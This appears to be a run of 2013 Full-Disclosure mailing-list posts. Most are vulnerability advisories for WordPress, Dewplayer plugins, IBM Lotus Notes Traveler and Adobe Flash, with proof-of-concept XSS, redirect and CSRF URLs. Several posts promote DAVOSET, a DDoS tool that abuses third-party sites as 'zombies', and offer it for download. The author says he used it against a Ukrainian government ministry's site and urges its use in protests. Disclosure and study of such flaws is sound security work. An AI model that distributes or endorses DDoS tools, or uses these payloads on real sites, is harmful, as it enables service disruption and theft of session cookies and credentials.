Hello participants of Mailing List. Happy New Year! After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. At 31st of December DAVOSET v.1.1.5 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). This is New Year Edition ;-). Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I Download DAVOSET v.1.1.5: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.5.rar Use, don't abuse. Happy holidays ddosing. In new version there was added error handler in GetCookie(), added new services into lists of zombies and removed non-working services from lists of zombies. Since during 2013 many sites with vulnerable web applications removed these webapps or closed sites completely. But many new vulnerable sites have come, so lists of zombies can be easily extended. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CSRF, XSS and Redirector vulnerabilities in IBM Lotus Notes Traveler
Hello list! These are Cross-Site Request Forgery, Cross-Site Scripting and Redirector vulnerabilities in IBM Lotus Notes Traveler. They are similar to CSRF, XSS and Redirector vulnerabilities in IBM Lotus Domino (http://securityvulns.ru/docs29060.html), which I announced at 19.05.2012 and disclosed 15.02.2013 (IBM fixed part of them at 14.03.2013), because login form in Notes Traveler is based on Domino's functionality. CVE ID: CVE-2012-4842, CVE-2012-4844. SecurityVulns ID: 12789. Since vulnerabilities are similar, so I mentioned previous CVE and SecurityVulns ids. These are some of 2012's vulnerabilities, which need to be released (since holes in Domino I released earlier this year). - Affected products: - Vulnerable are IBM Lotus Notes Traveler 8.5.3 and previous versions. These vulnerabilities were fixed in Domino 9.0 (only XSS and Redirector), which was released at 14.03.2013. All users of previous versions of Lotus Domino and Lotus Notes Traveler are vulnerable to these attacks and IBM didn't fix these holes in 8.5.x series, only in new 9.0 series. At that they didn't offer any workaround or mitigation for these issues. But I'll offer such workaround (see bellow), which can be used in previous versions of software. -- Details: -- Cross-Site Request Forgery (WASC-09): Lack of captcha in login form (http://site/servlet/traveler) can be used for different attacks - for CSRF-attack to login into account (remote login - to conduct attacks on vulnerabilities inside of account), for XSS attacks, for redirect, for Brute Force (which I described in other advisory) and other automated attacks. Which you can read about in the article "Attacks on unprotected login forms" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html). Examples of attacks on XSS and Redirector vulnerabilities with using of this CSRF vulnerability are provided bellow. Cross-Site Scripting (WASC-08): For attack it's needed to use working login and password at the site (i.e. the attacker needs to use existent account at the site - his own or someone's account, to which he got access via Brute Force vulnerability). Exploit: http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Notes%20Traveler%20Redirector.html Redirector (URL Redirector Abuse) (WASC-38): For attack it's needed to use working login and password at the site (i.e. the attacker needs to use existent account at the site - his own or someone's account, to which he got access via Brute Force vulnerability). Exploit: http://websecurity.com.ua/uploads/2013/IBM%20Lotus%20Notes%20Traveler%20Redirector.html - Workaround: - My workaround for these vulnerabilities is the next: turn off html-form for login and use Basic Authentication instead. Timeline: Full timeline of conversation with IBM read in the first advisory (http://securityvulns.ru/docs28474.html) and for similar vulnerabilities in Domino read timeline in previous advisory (http://securityvulns.ru/docs29060.html). - After conversation with IBM about previous vulnerabilities (mentioned in all my previous advisories concerning IBM software), during June-December 2012 I discussed these advisories with IBM. They answered very slowly and in most cases in their letters they wrote about holes related to Domino, but not to Notes Traveler. - At 12.12.2012 send them information about these vulnerabilities, after IBM at last answered on question concerning Notes Traveler. With those "call me maybe" employees in IBM and their slow answering and even more slow fixing of vulnerabilities, I'll not be anymore informing them about vulnerabilities. Instead I'll be selling them to interested security companies (already found such one this year). - At 15.02.2013 I disclosed at my site about IBM Lotus Domino. - At 30.12.2013 I disclosed at my site about IBM Lotus Notes Traveler (http://websecurity.com.ua/6951/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DoS vulnerability in Adobe Flash Player (BSOD)
Hello list! At beginning of this year I informed you about DoS vulnerability in Adobe Flash. Look at advisory (http://seclists.org/fulldisclosure/2013/Apr/9) with exploit and video demonstration (http://www.youtube.com/watch?v=xi29KZ3LD80) of previous DoS in Flash. Adobe hiddenly fixed it in the patch APSB13-05 and answered that "a fix to another hole accidentally fixed this hole". And here is a new DoS. Which can be new hole or can be related to old one (if Adobe has resurrected old DoS hole in new versions of Flash). This is Denial of Service vulnerability in Adobe Flash, which leaded to BSOD. Last week I informed Adobe and Mozilla (since attack works only in Mozilla browsers). - Affected products: - Attack works only on AMD/ATI video cards. I checked it on multiple computers with Windows XP, Windows 7 and Ubuntu Linux 13.04. Vulnerable Adobe Flash 11.9.900.152 and 11.9.900.170 (the last version) for Windows and Flash 11.2.202.332 for Linux (the last version for this OS). On Linux there is 100% CPU consumption and on Windows (XP and 7) there is crash of the OS. -- Details: -- Denial of Service (WASC-10): This is Denial of Service vulnerability, which leads to crash of Operating System (tested on Windows XP and 7). As previous DoS hole, this one also works only with AMD/ATI video cards (and it works on different OS unlike previous DoS in Flash). Also it works potentially in any flash media player in Internet - at any web sites, including YouTube (it doesn't require swf file of VideoJS, as previous hole). This is memory corruption (access violation) vulnerability. Which can be used for BSOD and potentially for remote code execution. Here is video, which demonstrates this vulnerability in Flash: http://www.youtube.com/watch?v=-YgbPCq-dH0 In the video there is web site with JW Player (but freezing and/or crashing of the OS happens in any flash video players). Attack is going on a browser Firefox (on Windows XP freezing or BSOD can be from the first or not from the first time, 100% CPU consumption on Linux works all the time). In Mozilla Firefox 3.0.19, 10.0.7 ESR, 15.0.1 and 26 - freezing of the browser and BSOD of the OS. I have disclosed it at my site (http://websecurity.com.ua/6939/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer
Hello list! These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins for WordPress, Joomla and Plone with Dewplayer. Earlier I wrote about vulnerabilities in Dewplayer (http://seclists.org/fulldisclosure/2013/Dec/192). This is media player, which is used at thousands web sites and in multiple web applications. There are near 422 000 web sites with dewplayer.swf in Google's index. And it's just one file name and there are other file names of this player (such as dewplayer-en.swf and others). This flash media player is used in the next plugins: Dewplayer WordPress plugin, JosDewplayer and mosdewplayer for Joomla and collective.dewplayer for Plone. Also there can be other plugins with Dewplayer. - Affected products: - Vulnerable are the next web applications: Dewplayer WordPress plugin 1.2 and previous versions, JosDewplayer 2.0 and previous versions, all versions of mosdewplayer, collective.dewplayer 1.2 and previous versions. Vulnerable are web applications which are using Dewplayer 2.2.2 and previous versions. - Affected vendors: - Plugins for different CMS with Dewplayer: http://wordpress.org/extend/plugins/dewplayer-flash-mp3-player/ http://extensions.joomla.org/extensions/multimedia/audio-players-a-gallery/4779 http://plone.org/products/collective.dewplayer -- Details: -- These are examples of some vulnerabilities in Dewplayer, examples of all СS and XSS vulnerabilities see in above-mentioned advisory. Dewplayer for WordPress: Plugin contains the next flash-files: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. All of them have CS holes. Content Spoofing (Content Injection) (WASC-12): http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3 http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3 Full path disclosure (WASC-13): http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php JosDewplayer and mosdewplayer: Plugin JosDewplayer is based on mosdewplayer, so holes must be similar in them. Plugin contains the next flash-files: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. All of them have CS holes. http://site/plugins/content/josdewplayer/dewplayer.swf collective.dewplayer: Plugin contains the next flash-files: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. All of these flash-files have CS holes and dewplayer-vinyl.swf also has XSS holes. The path at web site can be different: http://site/files/++resource++collective.dewplayer/dewplayer.swf Content Spoofing (Content Injection) (WASC-12): http://site/path/dewplayer.swf?mp3=1.mp3 XSS (WASC-08): http://site/path/dewplayer-vinyl.swf?xml=xss.xml xss.xml javascript:alert(document.cookie) XSS Timeline: 2013.10.25 - announced at my site. 2013.10.26 - informed developers. 2013.12.19 - disclosed at my site about Dewplayer. 2013.12.24 - disclosed at my site about plugins (http://websecurity.com.ua/6931/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in Dewplayer
Hello list! I want to inform you about vulnerabilities in Dewplayer. These are Content Spoofing and Cross-Site Scripting vulnerabilities. There are near 422 000 web sites with dewplayer.swf in Google's index. And it's just one file name and there are other file names of this player (such as dewplayer-en.swf and others). - Affected products: - Vulnerable are Dewplayer 2.2.2 and previous versions. - Affected vendors: - Alsacreations http://www.alsacreations.fr -- Details: -- Content Spoofing (Content Injection) (WASC-12): http://site/dewplayer.swf?mp3=1.mp3 http://site/dewplayer.swf?file=1.mp3 http://site/dewplayer.swf?sound=1.mp3 http://site/dewplayer.swf?son=1.mp3 This is for old versions of the player. In versions Dewplayer 2.x there is only mp3 from these 4 variants. Content Spoofing (Content Injection) (WASC-12): http://site/dewplayer.swf?xml=1.xml 1.xml http://site/1.mp3 Music 2.xml (with image) http://site/1.mp3 Music http://site/1.jpg XSS (WASC-08): Only vinyl version of Dewplayer are vulnerable to Cross-Site Scripting. http://site/dewplayer-vinyl.swf?xml=xss.xml http://site/dewplayer-vinyl-en.swf?xml=xss.xml xss.xml javascript:alert(document.cookie) XSS http://site/dewplayer-vinyl.swf?xml=xss2.xml http://site/dewplayer-vinyl-en.swf?xml=xss2.xml xss2.xml 1.mp3 XSS javascript:alert(document.cookie) Timeline: 2013.10.25 - announced at my site. 2013.10.26 - informed developers. 2013.12.19 - disclosed at my site (http://websecurity.com.ua/6831/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.5 and 3.5.1
Hello Julius! Concerning your tone see Post Scriptum. Concerning your question, then no, my mail-client doesn't cut anything :-). The last two e-mails with subjects "Vulnerabilities hiddenly fixed in WordPress 3.5 and 3.5.1" and "Vulnerabilities hiddenly fixed in WordPress 3.6 and 3.6.1" were not advisories, but informative letters. Thus they were not designed to have detailed description of vulnerabilities, just information about non-serious developers who hiddenly fixed multiple vulnerabilities in different versions of their software. I see it all the time, when lame developers hiddenly fix holes in their software (many developers do it, with different amount of holes hiddenly fixed, but still do it), so I decided on example of WordPress bring attention to this issue. Since I look after security of this web application since 2006 and found many cases of such activity from WP developers (as concerning holes which I found, as found by other security researchers), and wrote about many such cases in previous years. So in both these letter I wrote only the lists of hidden fixes (not details of vulnerabilities). In the second letter I wrote, that developers didn't mentioned about these holes not in announcement, nor in Codex, only mentioned in the changelog of the plugin (which you can see by the link, which I provided). without actually specifying the vulnerability I can understand dislike of advisories without details. I also don't like such advisories, like VUPEN's ones (http://securityvulns.ru/docs29802.html). But my two letters were not advisories. In my July's letter (http://seclists.org/fulldisclosure/2013/Jul/70) I wrote details about FPD vulnerability, which was hiddenly fixed, because it was advisory, but the last two letters were just informative ones, as I wrote above. Besides, in the last letter I described in details about a fix with adding .htaccess file, which is maximum necessary description for it - what did you not understand with it. This fix solves vulnerabilities which I disclosed last year, which are available in the list (http://seclists.org/fulldisclosure/2012/Jul/14 and http://seclists.org/fulldisclosure/2012/Jul/221). P.S. Pretty sure this is like the 50th time this year you send an email regarding a vulnerability without actually specifying the vulnerability I don't like lie and trolling (and trolls lie the most). Not this year, not any previous, nor during last 9 years in total, I didn't write 50 (or close numbers) e-mails about vulnerabilities without specifying their details. So you are completely wrong. Even I forgave your two trolling attempts earlier this year, but not this time. So I've blacklisted you for trolling and you should never comment on my letters not to my e-mail address, nor to the list. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Julius Kivimäki To: MustLive Cc: submissi...@packetstormsecurity.org ; full-disclosure@lists.grok.org.uk Sent: Monday, December 09, 2013 1:30 AM Subject: Re: [Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.5 and 3.5.1 Pretty sure this is like the 50th time this year you send an email regarding a vulnerability without actually specifying the vulnerability, are you sure your client isn't cutting out parts of your messages? 2013/12/8 MustLive Hello list! Earlier I wrote about one vulnerability in WordPress, which were hiddenly fixed in version 3.5.2 (http://seclists.org/fulldisclosure/2013/Jul/70) and about nine vulnerabilities in versions 3.6 and 3.6.1 (http://seclists.org/fulldisclosure/2013/Nov/220). Here are new ones. These are hiddenly fixed vulnerabilities in such versions of WordPress as 3.5 and 3.5.1. Developers of WP intentionally haven't wrote about them to decrease official number of fixed holes. Which is typical for them - since 2007 they often hide fixed vulnerabilities. As I wrote in July (http://websecurity.com.ua/6634/), there are multiple vulnerabilities in Akismet plugin, which bundles with core of WordPress, so all holes in this plugin directly related to WP. But developers typically fix holes in Akismet without mentioning about them among fixed in WP (in official announcement), they even didn't mentioned in announcement or Codex about updating version of the plugin. At that they wrote about fixed holes in plugin's changelog, but didn't write about fixed holes, which I informed in 2012 (and didn't fix all the holes). So these vulnerabilities were hiddenly fixed in WP 3.5 and 3.5.1, only mentioned in the changelog (http://wordpress.org/plugins/akismet/changelog/). WordPress 3.5.1: In this version of WP the Akismet was updated from 2.5.6 to 2.5.7. In it there were fixed few Full path disclosure vulnerabilities and added .htaccess to
[Full-disclosure] URL Redirector Abuse and XSS vulnerabilities in WordPress
Hello list! As I've announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordPress 3. At 30.11.2013 I disclosed many new vulnerabilities in WordPress. I've disclosed 10 holes (they were placed at my site for your attention). And this is translation of the third part of these holes. These are URL Redirector Abuse and Cross-Site Scripting vulnerabilities in WordPress. These are just few from multiple such holes in WP. I informed WordPress developers about the first two redirector holes in 2007 (and proposed a fix, which I released in my MustLive Security Pack), but they at first ignored them and then hiddenly fixed them in WP 2.3. After my informing about redirectors in 2007 (two ones) and in 2012 (in wp-comments-post.php and Akismet plugin, which is bundled with WP), thus I made a hint that there are a lot of such holes in WP, the developers fixed the first two vulnerabilities in 2007 and vulnerabilities in Akismet and below-mentioned vulnerabilities were fixed only in WP 3.6.1 (at 11.09.2013), when they made "global fix" for all redirectors in engine. - Affected products: - Vulnerable are WordPress 3.6 and previous versions (for one Redirector vulnerable are only versions 3.0 - 3.6). -- Details: -- Redirector (URL Redirector Abuse) (WASC-38): http://site/wp-admin/edit-tags.php?action=delete&_wp_http_referer=http://websecurity.com.ua/?edit-tags.php XSS (WASC-08): http://site/wp-admin/edit-tags.php?action=delete&_wp_http_referer=data:text/html;edit-tags.php;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B Redirector (URL Redirector Abuse) (WASC-38): Only Redirector is possible, but not XSS (due to filtration of important characters). For the attack it's needed to know value of _wpnonce. http://site/wp-admin/edit-tags.php?action=add-tag&_wpnonce=096ea8dbbd&_wp_original_http_referer=http://websecurity.com.ua/?edit-tags.php For this Redirector vulnerable are WordPress 3.0 - 3.6. And for these two vulnerable are WordPress 3.6 and previous versions: http://site/wp-admin/edit-tags.php?action=bulk-delete&_wpnonce=ebee6d0330&_wp_http_referer=http://websecurity.com.ua/?edit-tags.php http://site/wp-admin/media.php?action=editattachment&_wpnonce=2fa131c992&_wp_original_http_referer=http://websecurity.com.ua/?upload.php Timeline: 2013.11.30 - disclosed at my site (http://websecurity.com.ua/6907/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CSRF, DoS and IL vulnerabilities in WordPress
Hello list! As I've announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordPress 3. At 30.11.2013 I disclosed many new vulnerabilities in WordPress. I've disclosed 10 holes (they were placed at my site for your attention). And this is translation of the second part of these holes. These are Cross-Site Request Forgery, Denial of Service and Information Leakage vulnerabilities in WordPress. - Affected products: - For CSRF and DoS vulnerable are WordPress 2.0.11 and previous versions (which had this functionality). Instead of fixing the holes, developers removed this functionality. For Information Leakage vulnerable are WordPress 3.7.1 and previous versions. And also WP 3.8, which was released at 14.12.2013 (since developers traditionally made their new version "vulnerabilities compatible"). -- Details: -- Cross-Site Request Forgery (WASC-09) / Denial of Service (WASC-10): There is no protection against CSRF in retrospam functionality. http://site/wp-admin/options-discussion.php?action=retrospam The request starts checking of the comments on stop-words, which overloads the server. The more words in the list (and it's possible to add any amount of them via XSS vulnerability) and the more comments at the site, the more overload. Cross-Site Request Forgery (WASC-09): http://site/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1 This request moves comments, including moderated ones, to moderation list. It's just needed to set ids of comments. Information Leakage (WASC-13): At request to the page options.php it's possible to receive important data from DB. As at access to admin panel, as it's possible to get content of the page via XSS attack. Particularly different keys, salts, logins and passwords, such as auth_key, auth_salt, logged_in_key, logged_in_salt, nonce_key, nonce_salt, mailserver_login, mailserver_pass (the amount of parameters depends on version of WP). http://site/wp-admin/options.php About leakage of login and password from e-mail account (which are saved in DB in plain text) at other page of admin panel I wrote in previous advisory (http://seclists.org/fulldisclosure/2013/Dec/135). This is the second page, where there is a leakage of this data. It allows to take over this site (including in the future, via password recovery function) and other sites, where there is password recovery function, which will send letters to this e-mail. Because an user may use his main e-mail account in the settings (I saw such cases in Internet). Timeline: 2013.11.30 - disclosed at my site (http://websecurity.com.ua/6906/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Information Leakage and Backdoor vulnerabilities in WordPress
Hello list! As I've announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordPress 3. At 30.11.2013 I disclosed many new vulnerabilities in WordPress. I've disclosed 10 holes (they were placed at my site for your attention). And this is translation of the first part of these holes. These are Information Leakage and Backdoor vulnerabilities in WordPress. Which I knew since June 2006 and they are still actual for all versions of WP. - Affected products: - Vulnerable are WordPress 3.7.1 and previous versions. And also WP 3.8, which was released at 14.12.2013 (since developers traditionally made their new version "vulnerabilities compatible"). -- Details: -- Information Leakage (WASC-13): The login and password from e-mail are saved in DB in plain text (unencrypted) in Writing Settings (http://site/wp-admin/options-writing.php), if this functionality is used. So by receiving data from DB via SQL Injection or Information Leakage vulnerability, or by receiving content of this page via XSS, or by accessing admin panel via any vulnerability, it's possible to get login and password from e-mail account. Which allows to take over this site (including in the future, via password recovery function) and other sites, where there is password recovery function, which will send letters to this e-mail. Because an user may use his main e-mail account in the settings (I saw such cases in Internet). This is complete jackpot. Backdoor: This functionality also can be used as backdoor. When attacker's e-mail is set in options Writing Settings, from which the posts will be published at web site. With XSS code, with black SEO links, with malware code, etc. Timeline: 2013.11.30 - disclosed at my site (http://websecurity.com.ua/6905/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.5 and 3.5.1
Hello list! Earlier I wrote about one vulnerability in WordPress, which were hiddenly fixed in version 3.5.2 (http://seclists.org/fulldisclosure/2013/Jul/70) and about nine vulnerabilities in versions 3.6 and 3.6.1 (http://seclists.org/fulldisclosure/2013/Nov/220). Here are new ones. These are hiddenly fixed vulnerabilities in such versions of WordPress as 3.5 and 3.5.1. Developers of WP intentionally haven't wrote about them to decrease official number of fixed holes. Which is typical for them - since 2007 they often hide fixed vulnerabilities. As I wrote in July (http://websecurity.com.ua/6634/), there are multiple vulnerabilities in Akismet plugin, which bundles with core of WordPress, so all holes in this plugin directly related to WP. But developers typically fix holes in Akismet without mentioning about them among fixed in WP (in official announcement), they even didn't mentioned in announcement or Codex about updating version of the plugin. At that they wrote about fixed holes in plugin's changelog, but didn't write about fixed holes, which I informed in 2012 (and didn't fix all the holes). So these vulnerabilities were hiddenly fixed in WP 3.5 and 3.5.1, only mentioned in the changelog (http://wordpress.org/plugins/akismet/changelog/). WordPress 3.5.1: In this version of WP the Akismet was updated from 2.5.6 to 2.5.7. In it there were fixed few Full path disclosure vulnerabilities and added .htaccess to block direct access to plugin's files (which can be used for protecting against FPD, XSS and Redirector vulnerabilities disclosed by me in 2012). Vulnerable are WordPress 3.5 and previous versions. WordPress 3.5.2: In this version of WP the Akismet was updated from 2.5.7 to 2.5.8. In it there are security improvements (they didn't specify the details). Vulnerable are WordPress 3.5.1 and previous versions. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.6 and 3.6.1
Hello Ryan! There are many cases with different classes of vulnerabilities hiddenly fixed in WordPress (during 2007-2013 I wrote about many such cases, including wrote on English in security mailing lists). These FPD vulnerabilities just particular examples for WP 3.6 and 3.6.1. The main point is that WP developers for a long time are doing such bad thing as hidden fixing holes and it must never be done for any classes of vulnerabilities. Concerning Full Path Disclosures holes in WordPress. At 24.03.2013 I checked different versions of WP and find all external (non in admin panel) FPD holes in them with my tool FPD Finder. Particularly in WordPress 3.3.1 (which was the last version at that time) I found 176 FPD holes. The amount of such holes is increasing all the time, because WP developers ignore them. I know about YEHG's inspathx tool, but I don't like to use other tools and like to make and use my own tools. So I made my tool FPD Finder in the beginning of 2012 and made tests of FPD holes in different web applications, including WordPress. When I'll find time and desire to publish WP results and the tool itself, I'll do it. At that last year I wrote about FPD vulnerabilities in MODx (which I found in May 2012 with my tool) - I also disclosed it to this list (http://lists.grok.org.uk/pipermail/full-disclosure/2012-November/088924.html). So results of the work of FPD Finder already available for the public. > WordPress's stance on this is: > > "Why are there path disclosures when directly loading certain files? > This is considered a server configuration problem. Never enable > display_errors on a production site." This is default PHP configuration (so all holes are a priori valid). So it's up to developers to manually prevent FPD in all their php-scripts. Since they are lazy (don't do it) and lamers (don't understand the holes), hence the large amount of FPD holes. As all other holes in this and all those web applications, about vulnerabilities in which have been written during the whole history of WWW. > WordPress do not consider this a security bug and instead a configuration > problem. A lot of lamers do the same. As a lot of lamers don't consider any arbitrary class of vulnerabilities (which exists in WASC and OWASP classifications) as a hole - I see it all the time during last 9 years. Which doesn't change nothing - the holes are indeed the holes regardless of point of view of individual developers. > They will not fix any and therefor WordPress is absolutely full of FPD issues. As it always was, is and will be. Until the developers will change their opinion and start fixing them. But main point in my letter was, that developers regularly fix some of the FPD holes. Sometimes they mentioned them in "fixed bugs" section, sometimes not, but there were cases where they fixed FPD and wrote about it in announcement as vulnerability (like in version 3.5.2). And all FPD holes must be handled in the same way, not just position with "directly loaded certain files", but with all others (now the developers have different approach with them). And don't ignore all FPD, but exactly fix all FPD. And the holes, which I wrote about, those exactly are not "directly loaded certain files", but are FPD at certain actions at web site, so developers fixed them. But didn't mentioned about them officially. But they exactly wrote in announcement about FPD in WP 3.5.2 (http://wordpress.org/news/2013/06/wordpress-3-5-2/). So it's double standards, which is unacceptable for any developer. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Ryan Dewhurst To: MustLive Cc: submissi...@packetstormsecurity.org ; full-disclosure Sent: Saturday, November 30, 2013 10:19 PM Subject: Re: [Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.6 and 3.6.1 Although I do not agree with this point, WordPress's stance on this is: "Why are there path disclosures when directly loading certain files? This is considered a server configuration problem. Never enable display_errors on a production site." - http://codex.wordpress.org/Security_FAQ#Why_are_there_path_disclosures_when_directly_loading_certain_files.3F WordPress do not consider this a security bug and instead a configuration problem. They will not fix any and therefor WordPress is absolutely full of FPD issues. I did some research back in 2011 and found that the first version of WordPress I could install (0.71-gold) had 44 FPDs, whereas the latest at the time of the research (3.2.1) had 155 FDPs - http://www.ethicalhack3r.co.uk/full-path-disclosure-fpd/ Here is every FPD issue I identified from version 0.71-gold to version 3.2.1 - http://ethicalhack3r.co.u
Re: [Full-disclosure] DAVOSET v.1.1.4
Hello psy! I suggest you to watch my videos from Euromaydan in Kyiv (http://www.youtube.com/user/MustLiveUA/videos). If you look at three videos from 01.12.2013, which I recorded at Independence Square (two blocks from President's administration, where there were events showed on that video at rutube), you will see different picture. All protests were and are going peacefully. You can see it on all my videos. While during two ours I was at center of the city and recorded those three videos and didn't see any fightings or assaults, and I haven't heard about such actions from more then half million people - everything was calm - at the same time there was assault of President's administration (showed on that video). I saw similar videos from news already when came home. It's just one such episode, there are much more episodes with police brutality. And I and other Ukrainian hackers are protesting "in online" exactly against police cruelty on duty for authoritarian regime, and against it all people are protesting "in offline". At 24.11 and some other days, there were cases where police kicked some people (including opposition deputies), but without large confrontation. All changed at morning of Saturday (http://24tv.ua/home/showSingleNews.do?krivava_subota_30_listopada_u_faktah_foto_video&objectId=388037). Those events near President's administration at 01.12 are made by provokers - to force president to initiate the state of emergency. But it haven't helped and he didn't initiate it. So always watch different videos to better understand the situation. If you find some Yes, I agree with you. There are such people. I hope there will be no such hackers in Ukraine. Now is a time to stand against regime together. And I hope that my tool DAVOSET will help people all around the world, especially for protests. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: "psy" To: "MustLive" Cc: Sent: Wednesday, December 04, 2013 3:15 AM Subject: Re: [Full-disclosure] DAVOSET v.1.1.4 On 03/12/13 22:57, MustLive wrote: Hello participants of Mailing List. At 01.12.2013, when I started DDoSing web site of Ministry of Internal Affairs of Ukraine with my tool DAVOSET (during protest against cruel police actions on Saturday in Kyiv against people at Euromaydan) Wow!. Amazing what's going on in Kiev: http://rutube.ru/video/5c49a9649614e053aee854767b1a0795/ And also, arround the world... But, there is something more amazing that is watch how some supposedly 'ethical/white-hat/famous' hackers are taking money on big companies co-defending corrupt goverments, every day. They have the opportunity to leak important information that feed police-states of terror, but they prefer to be silent like bitches. If you find some, please, give to them a message: "The hottest places in hell are reserved for those who in times of moral crisis maintain their neutrality." Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I Big Work mr. MustLive. Can be nice if you show results on server side. Kisses! psy Download DAVOSET v.1.1.4: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.4.rar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.1.4
Hello participants of Mailing List. At 01.12.2013, when I started DDoSing web site of Ministry of Internal Affairs of Ukraine with my tool DAVOSET (during protest against cruel police actions on Saturday in Kyiv against people at Euromaydan), I found that there was a bug in software, which concern two sites from list_full.txt, and also there were some non-working sites. Which I've fixed. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. At 3rd of December DAVOSET v.1.1.4 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I Download DAVOSET v.1.1.4: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.4.rar Use, don't abuse. In new version there was added new service into full list of zombies, removed non-working services from lists of zombies and fixed one bug. So now you have up to date software with fresh lists of zombies for participating in protests actions. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.6 and 3.6.1
Hello list! In July I wrote about one vulnerability in WordPress, which were hiddenly fixed in version 3.5.2 (http://securityvulns.ru/docs29555.html). Here are new ones. These are hiddenly fixed vulnerabilities in such versions of WordPress as 3.6 and 3.6.1. Developers of WP intentionally haven't wrote about them to decrease official number of fixed holes. Which is typical for them - since 2007 they often hide fixed vulnerabilities. As I wrote in September (http://websecurity.com.ua/6795/), there are 9 FPD vulnerabilities, which were hiddenly fixed in WP 3.6. They were not mentioned in announcement, only mentioned in Codex (as "bugs"). Even there were cases, when WP developers wrote about fixed FPD in official announcements. Full path disclosure (WASC-13): In Media Library if an attachment parent does not exist. In function parent_dropdown(). In function wp_new_comment(). In function mb_internal_encoding(). At processing of image metadata. In function get_post_type_archive_feed_link(). In function WP_Image_Editor::multi_resize(). In function wp_generate_attachment_metadata(). At deleting or restoring an item that no longer exists. Vulnerable are WordPress 3.5.2 and previous versions. As I wrote in November (http://websecurity.com.ua/6904/), there are 3 FPD vulnerabilities, which were hiddenly fixed in WP 3.6.1. They were not mentioned in announcement or Codex. 